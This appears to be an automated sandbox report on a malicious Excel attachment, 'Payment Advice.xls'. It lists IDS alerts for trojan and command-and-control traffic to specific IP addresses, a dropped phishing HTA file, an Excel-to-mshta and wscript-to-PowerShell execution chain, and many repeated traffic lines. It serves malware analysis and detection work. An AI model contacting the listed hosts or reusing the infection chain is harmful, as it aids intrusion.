              2024-10-29T10:13:36.463967+010020216411A Network Trojan was detected192.168.2.224918594.156.177.22080TCP
              2024-10-29T10:13:37.579761+010020216411A Network Trojan was detected192.168.2.224918694.156.177.22080TCP
              2024-10-29T10:13:39.050088+010020216411A Network Trojan was detected192.168.2.224918794.156.177.22080TCP
              2024-10-29T10:13:40.170722+010020216411A Network Trojan was detected192.168.2.224918894.156.177.22080TCP
              2024-10-29T10:13:41.781266+010020216411A Network Trojan was detected192.168.2.224918994.156.177.22080TCP
              2024-10-29T10:13:42.896730+010020216411A Network Trojan was detected192.168.2.224919094.156.177.22080TCP
              2024-10-29T10:13:44.993804+010020216411A Network Trojan was detected192.168.2.224919194.156.177.22080TCP
              2024-10-29T10:13:46.280841+010020216411A Network Trojan was detected192.168.2.224919294.156.177.22080TCP
              2024-10-29T10:13:47.420972+010020216411A Network Trojan was detected192.168.2.224919394.156.177.22080TCP
              2024-10-29T10:13:48.603620+010020216411A Network Trojan was detected192.168.2.224919494.156.177.22080TCP
              2024-10-29T10:13:49.772798+010020216411A Network Trojan was detected192.168.2.224919594.156.177.22080TCP
              2024-10-29T10:13:50.927162+010020216411A Network Trojan was detected192.168.2.224919694.156.177.22080TCP
              2024-10-29T10:13:52.047823+010020216411A Network Trojan was detected192.168.2.224919794.156.177.22080TCP
              2024-10-29T10:13:53.157010+010020216411A Network Trojan was detected192.168.2.224919894.156.177.22080TCP
              2024-10-29T10:13:54.270732+010020216411A Network Trojan was detected192.168.2.224919994.156.177.22080TCP
              2024-10-29T10:13:55.369834+010020216411A Network Trojan was detected192.168.2.224920094.156.177.22080TCP
              2024-10-29T10:13:56.838879+010020216411A Network Trojan was detected192.168.2.224920194.156.177.22080TCP
              2024-10-29T10:13:57.950747+010020216411A Network Trojan was detected192.168.2.224920294.156.177.22080TCP
              2024-10-29T10:13:59.074338+010020216411A Network Trojan was detected192.168.2.224920394.156.177.22080TCP
              2024-10-29T10:14:00.190441+010020216411A Network Trojan was detected192.168.2.224920494.156.177.22080TCP
              2024-10-29T10:14:01.529409+010020216411A Network Trojan was detected192.168.2.224920594.156.177.22080TCP
              2024-10-29T10:14:02.711233+010020216411A Network Trojan was detected192.168.2.224920694.156.177.22080TCP
              2024-10-29T10:14:04.625906+010020216411A Network Trojan was detected192.168.2.224920794.156.177.22080TCP
              2024-10-29T10:14:05.771818+010020216411A Network Trojan was detected192.168.2.224920894.156.177.22080TCP
              2024-10-29T10:14:06.869151+010020216411A Network Trojan was detected192.168.2.224920994.156.177.22080TCP
              2024-10-29T10:14:08.021965+010020216411A Network Trojan was detected192.168.2.224921094.156.177.22080TCP
              2024-10-29T10:14:09.220051+010020216411A Network Trojan was detected192.168.2.224921194.156.177.22080TCP
              2024-10-29T10:14:10.347813+010020216411A Network Trojan was detected192.168.2.224921294.156.177.22080TCP
              2024-10-29T10:14:11.459902+010020216411A Network Trojan was detected192.168.2.224921394.156.177.22080TCP
              2024-10-29T10:14:12.547431+010020216411A Network Trojan was detected192.168.2.224921494.156.177.22080TCP
              2024-10-29T10:14:13.671022+010020216411A Network Trojan was detected192.168.2.224921594.156.177.22080TCP
              2024-10-29T10:14:14.801048+010020216411A Network Trojan was detected192.168.2.224921694.156.177.22080TCP
              2024-10-29T10:14:15.922364+010020216411A Network Trojan was detected192.168.2.224921794.156.177.22080TCP
              2024-10-29T10:14:17.265733+010020216411A Network Trojan was detected192.168.2.224921894.156.177.22080TCP
              2024-10-29T10:14:18.392312+010020216411A Network Trojan was detected192.168.2.224921994.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:13:13.410137+010020490381A Network Trojan was detected142.250.185.97443192.168.2.2249176TCP
              2024-10-29T10:13:14.186300+010020490381A Network Trojan was detected142.250.185.97443192.168.2.2249173TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:28.076357+010028257661Malware Command and Control Activity Detected192.168.2.224922094.156.177.22080TCP
              2024-10-29T10:13:29.856264+010028257661Malware Command and Control Activity Detected192.168.2.224917994.156.177.22080TCP
              2024-10-29T10:13:30.955412+010028257661Malware Command and Control Activity Detected192.168.2.224918094.156.177.22080TCP
              2024-10-29T10:13:31.998506+010028257661Malware Command and Control Activity Detected192.168.2.224918194.156.177.22080TCP
              2024-10-29T10:13:33.108548+010028257661Malware Command and Control Activity Detected192.168.2.224918294.156.177.22080TCP
              2024-10-29T10:13:34.231392+010028257661Malware Command and Control Activity Detected192.168.2.224918394.156.177.22080TCP
              2024-10-29T10:13:35.341029+010028257661Malware Command and Control Activity Detected192.168.2.224918494.156.177.22080TCP
              2024-10-29T10:13:36.463967+010028257661Malware Command and Control Activity Detected192.168.2.224918594.156.177.22080TCP
              2024-10-29T10:13:37.579761+010028257661Malware Command and Control Activity Detected192.168.2.224918694.156.177.22080TCP
              2024-10-29T10:13:39.050088+010028257661Malware Command and Control Activity Detected192.168.2.224918794.156.177.22080TCP
              2024-10-29T10:13:40.170722+010028257661Malware Command and Control Activity Detected192.168.2.224918894.156.177.22080TCP
              2024-10-29T10:13:41.781266+010028257661Malware Command and Control Activity Detected192.168.2.224918994.156.177.22080TCP
              2024-10-29T10:13:42.896730+010028257661Malware Command and Control Activity Detected192.168.2.224919094.156.177.22080TCP
              2024-10-29T10:13:44.993804+010028257661Malware Command and Control Activity Detected192.168.2.224919194.156.177.22080TCP
              2024-10-29T10:13:46.280841+010028257661Malware Command and Control Activity Detected192.168.2.224919294.156.177.22080TCP
              2024-10-29T10:13:47.420972+010028257661Malware Command and Control Activity Detected192.168.2.224919394.156.177.22080TCP
              2024-10-29T10:13:48.603620+010028257661Malware Command and Control Activity Detected192.168.2.224919494.156.177.22080TCP
              2024-10-29T10:13:49.772798+010028257661Malware Command and Control Activity Detected192.168.2.224919594.156.177.22080TCP
              2024-10-29T10:13:50.927162+010028257661Malware Command and Control Activity Detected192.168.2.224919694.156.177.22080TCP
              2024-10-29T10:13:52.047823+010028257661Malware Command and Control Activity Detected192.168.2.224919794.156.177.22080TCP
              2024-10-29T10:13:53.157010+010028257661Malware Command and Control Activity Detected192.168.2.224919894.156.177.22080TCP
              2024-10-29T10:13:54.270732+010028257661Malware Command and Control Activity Detected192.168.2.224919994.156.177.22080TCP
              2024-10-29T10:13:55.369834+010028257661Malware Command and Control Activity Detected192.168.2.224920094.156.177.22080TCP
              2024-10-29T10:13:56.838879+010028257661Malware Command and Control Activity Detected192.168.2.224920194.156.177.22080TCP
              2024-10-29T10:13:57.950747+010028257661Malware Command and Control Activity Detected192.168.2.224920294.156.177.22080TCP
              2024-10-29T10:13:59.074338+010028257661Malware Command and Control Activity Detected192.168.2.224920394.156.177.22080TCP
              2024-10-29T10:14:00.190441+010028257661Malware Command and Control Activity Detected192.168.2.224920494.156.177.22080TCP
              2024-10-29T10:14:01.529409+010028257661Malware Command and Control Activity Detected192.168.2.224920594.156.177.22080TCP
              2024-10-29T10:14:02.711233+010028257661Malware Command and Control Activity Detected192.168.2.224920694.156.177.22080TCP
              2024-10-29T10:14:04.625906+010028257661Malware Command and Control Activity Detected192.168.2.224920794.156.177.22080TCP
              2024-10-29T10:14:05.771818+010028257661Malware Command and Control Activity Detected192.168.2.224920894.156.177.22080TCP
              2024-10-29T10:14:06.869151+010028257661Malware Command and Control Activity Detected192.168.2.224920994.156.177.22080TCP
              2024-10-29T10:14:08.021965+010028257661Malware Command and Control Activity Detected192.168.2.224921094.156.177.22080TCP
              2024-10-29T10:14:09.220051+010028257661Malware Command and Control Activity Detected192.168.2.224921194.156.177.22080TCP
              2024-10-29T10:14:10.347813+010028257661Malware Command and Control Activity Detected192.168.2.224921294.156.177.22080TCP
              2024-10-29T10:14:11.459902+010028257661Malware Command and Control Activity Detected192.168.2.224921394.156.177.22080TCP
              2024-10-29T10:14:12.547431+010028257661Malware Command and Control Activity Detected192.168.2.224921494.156.177.22080TCP
              2024-10-29T10:14:13.671022+010028257661Malware Command and Control Activity Detected192.168.2.224921594.156.177.22080TCP
              2024-10-29T10:14:14.801048+010028257661Malware Command and Control Activity Detected192.168.2.224921694.156.177.22080TCP
              2024-10-29T10:14:15.922364+010028257661Malware Command and Control Activity Detected192.168.2.224921794.156.177.22080TCP
              2024-10-29T10:14:17.265733+010028257661Malware Command and Control Activity Detected192.168.2.224921894.156.177.22080TCP
              2024-10-29T10:14:18.392312+010028257661Malware Command and Control Activity Detected192.168.2.224921994.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:28.076357+010028582951A Network Trojan was detected198.46.178.15580192.168.2.2249177TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T10:12:40.794398+010028587951A Network Trojan was detected192.168.2.2249167198.46.178.15580TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Machine Learning detection for sample
              Source: Payment Advice.xlsJoe Sandbox ML: detected

              Phishing

              barindex
              Yara detected HtmlPhish44
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].hta, type: DROPPED
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49168 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.22:49173 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49175 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.22:49176 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49165 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49171 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49172 version: TLS 1.2
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.pdb source: powershell.exe, 00000011.00000002.483591075.0000000002561000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.pdb source: powershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.pdbhP source: powershell.exe, 00000011.00000002.483591075.00000000027AE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.pdbhP source: powershell.exe, 00000005.00000002.445010616.0000000002312000.00000004.00000800.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: global trafficDNS query: name: acesso.run
              Source: global trafficDNS query: name: acesso.run
              Source: global trafficDNS query: name: drive.google.com
              Source: global trafficDNS query: name: acesso.run
              Source: global trafficDNS query: name: acesso.run
              Source: global trafficDNS query: name: drive.usercontent.google.com
              Source: global trafficDNS query: name: drive.usercontent.google.com
              Source: global trafficDNS query: name: drive.google.com
              Source: global trafficDNS query: name: drive.usercontent.google.com
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49175 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49164 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49174 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49177 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49178 -> 198.46.178.155:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.74.191:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.184.206:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
              Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.185.97:443
